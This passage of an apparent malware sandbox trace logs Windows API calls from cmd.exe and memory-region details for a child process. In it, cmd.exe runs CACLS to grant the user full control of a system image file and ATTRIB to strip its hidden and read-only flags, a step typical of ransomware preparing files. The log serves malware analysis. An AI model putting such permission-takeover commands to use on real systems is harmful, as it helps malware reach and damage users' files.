lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.361] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x30f730, lpFilePart=0x30f72c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f72c*="Desktop") returned 0x18 [0185.361] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0185.361] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x30f4ac | out: lpFindFileData=0x30f4ac) returned 0xb0ae8 [0185.361] FindClose (in: hFindFile=0xb0ae8 | out: hFindFile=0xb0ae8) returned 1 [0185.361] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x30f4ac | out: lpFindFileData=0x30f4ac) returned 0xb0ae8 [0185.362] FindClose (in: hFindFile=0xb0ae8 | out: hFindFile=0xb0ae8) returned 1 [0185.362] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x30f4ac | out: lpFindFileData=0x30f4ac) returned 0xb0ae8 [0185.362] FindClose (in: hFindFile=0xb0ae8 | out: hFindFile=0xb0ae8) returned 1 [0185.362] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0185.362] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0185.362] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0185.362] GetEnvironmentStringsW () returned 0xb0308* [0185.362] FreeEnvironmentStringsW (penv=0xb0308) returned 1 [0185.362] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0185.363] GetConsoleOutputCP () returned 0x1b5 [0185.363] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.363] GetUserDefaultLCID () returned 0x409 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 
2 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x30f870, cchData=128 | out: lpLCData="0") returned 2 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x30f870, cchData=128 | out: lpLCData="0") returned 2 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x30f870, cchData=128 | out: lpLCData="1") returned 2 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0185.363] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0185.364] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0185.364] GetConsoleTitleW (in: lpConsoleTitle=0xa09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.364] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0185.364] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c 
[0185.365] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0185.365] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0185.365] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0185.366] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0185.366] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0185.366] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0185.366] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0185.366] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0185.366] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0185.366] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0185.369] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0185.369] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0185.369] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0185.369] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0185.369] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0185.369] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0185.369] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0185.371] GetConsoleTitleW (in: lpConsoleTitle=0x30f504, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.371] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0185.371] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0185.371] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0185.371] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0185.371] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0185.371] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0185.371] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0185.371] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0185.371] _wcsicmp 
(_String1="CACLS", _String2="REN") returned -15 [0185.371] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0185.371] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0185.371] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0185.371] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0185.371] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0185.371] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0185.371] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0185.371] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0185.371] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0185.371] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0185.371] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0185.371] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0185.371] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0185.371] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0185.371] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0185.371] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0185.371] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0185.371] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0185.371] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0185.372] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0185.372] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0185.372] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0185.372] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0185.372] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0185.372] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0185.372] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0185.372] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0185.372] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0185.372] 
_wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0185.372] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0185.372] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0185.372] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0185.372] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0185.372] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0185.372] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0185.372] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0185.372] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0185.372] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0185.372] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0185.372] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0185.372] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0185.372] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0185.372] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0185.372] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0185.372] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0185.372] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0185.372] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0185.372] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0185.372] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0185.372] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0185.372] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0185.372] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0185.372] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0185.372] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0185.372] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0185.372] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0185.372] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0185.372] 
_wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0185.372] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0185.372] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0185.372] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0185.372] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0185.372] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0185.372] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0185.372] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0185.372] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0185.372] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0185.373] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0185.373] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0185.373] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0185.373] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0185.373] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0185.373] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0185.373] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0185.373] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0185.373] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0185.373] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0185.373] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0185.373] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0185.373] SetErrorMode (uMode=0x0) returned 0x0 [0185.373] SetErrorMode (uMode=0x1) returned 0x0 [0185.373] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xb1e98, lpFilePart=0x30f024 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x30f024*="Desktop") returned 0x18 [0185.373] SetErrorMode (uMode=0x0) returned 0x1 [0185.373] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.373] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.378] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.379] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xffffffff [0185.379] GetLastError () returned 0x2 [0185.379] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xffffffff [0185.379] GetLastError () returned 0x2 [0185.379] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xb2180 [0185.379] FindClose (in: hFindFile=0xb2180 | out: hFindFile=0xb2180) returned 1 [0185.380] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xffffffff [0185.380] GetLastError () returned 0x2 [0185.380] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xb2180 [0185.380] FindClose (in: hFindFile=0xb2180 | out: hFindFile=0xb2180) returned 1 [0185.380] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0185.380] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0185.380] GetConsoleTitleW (in: 
lpConsoleTitle=0x30f298, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.380] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f120, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f1e8 | out: lpAttributeList=0x30f120, lpSize=0x30f1e8) returned 1 [0185.380] UpdateProcThreadAttribute (in: lpAttributeList=0x30f120, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f1e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f120, lpPreviousValue=0x0) returned 1 [0185.380] GetStartupInfoW (in: lpStartupInfo=0x30f0dc | out: lpStartupInfo=0x30f0dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0185.380] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.381] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f17c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f1c8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G EEBsYm5:F /C ", 
lpProcessInformation=0x30f1c8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xe6c, dwThreadId=0x89c)) returned 1 [0185.389] CloseHandle (hObject=0x4c) returned 1 [0185.389] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.389] GetEnvironmentStringsW () returned 0xb0308* [0185.389] FreeEnvironmentStringsW (penv=0xb0308) returned 1 [0185.389] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0185.420] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x30f0bc | out: lpExitCode=0x30f0bc*=0x0) returned 1 [0185.420] CloseHandle (hObject=0x50) returned 1 [0185.420] _vsnwprintf (in: _Buffer=0x30f204, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f0c8 | out: _Buffer="00000000") returned 8 [0185.420] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.420] GetEnvironmentStringsW () returned 0xb2410* [0185.420] FreeEnvironmentStringsW (penv=0xb2410) returned 1 [0185.420] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.420] GetEnvironmentStringsW () returned 0xb2410* [0185.420] FreeEnvironmentStringsW (penv=0xb2410) returned 1 [0185.420] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f120 | out: lpAttributeList=0x30f120) [0185.420] GetConsoleTitleW (in: lpConsoleTitle=0x30f504, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.421] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0185.421] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0185.421] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0185.421] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30eda0, 
fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xffffffff [0185.421] GetLastError () returned 0x2 [0185.421] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xffffffff [0185.421] GetLastError () returned 0x2 [0185.421] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xae4d8 [0185.421] FindClose (in: hFindFile=0xae4d8 | out: hFindFile=0xae4d8) returned 1 [0185.422] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xffffffff [0185.422] GetLastError () returned 0x2 [0185.422] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x30eda0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30eda0) returned 0xae4d8 [0185.422] FindClose (in: hFindFile=0xae4d8 | out: hFindFile=0xae4d8) returned 1 [0185.422] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0185.422] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0185.422] GetConsoleTitleW (in: lpConsoleTitle=0x30f298, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0185.422] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f120, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f1e8 | out: lpAttributeList=0x30f120, lpSize=0x30f1e8) returned 1 [0185.422] UpdateProcThreadAttribute (in: lpAttributeList=0x30f120, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f1e0, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f120, lpPreviousValue=0x0) 
returned 1 [0185.422] GetStartupInfoW (in: lpStartupInfo=0x30f0dc | out: lpStartupInfo=0x30f0dc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0185.422] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0185.422] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x30f17c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f1c8 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\"", lpProcessInformation=0x30f1c8*(hProcess=0x4c, hThread=0x50, dwProcessId=0xecc, dwThreadId=0xf20)) returned 1 [0185.424] CloseHandle (hObject=0x50) returned 1 [0185.424] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0185.424] GetEnvironmentStringsW () returned 0xb2410* [0185.424] FreeEnvironmentStringsW (penv=0xb2410) returned 1 [0185.424] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0185.459] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x30f0bc | out: lpExitCode=0x30f0bc*=0x0) 
returned 1 [0185.459] CloseHandle (hObject=0x4c) returned 1 [0185.459] _vsnwprintf (in: _Buffer=0x30f204, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f0c8 | out: _Buffer="00000000") returned 8 [0185.459] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0185.459] GetEnvironmentStringsW () returned 0xb2410* [0185.459] FreeEnvironmentStringsW (penv=0xb2410) returned 1 [0185.459] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0185.459] GetEnvironmentStringsW () returned 0xb2410* [0185.459] FreeEnvironmentStringsW (penv=0xb2410) returned 1 [0185.459] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f120 | out: lpAttributeList=0x30f120) [0185.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.459] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0185.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0185.459] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0185.459] _get_osfhandle (_FileHandle=0) returned 0x3 [0185.459] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0185.460] SetConsoleInputExeNameW () returned 0x1 [0185.460] GetConsoleOutputCP () returned 0x1b5 [0185.460] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0185.460] SetThreadUILanguage (LangId=0x0) returned 0x409 [0185.460] exit (_Code=0) Process: id = "371" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16ca0" os_pid = "0xe6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "370" os_parent_pid = "0xd44" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" 
[0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26396 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26397 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 26398 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26399 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 26400 start_va = 0xbb0000 end_va = 0xbb8fff entry_point = 0xbb0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26401 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26402 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26403 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26404 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 26405 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = 
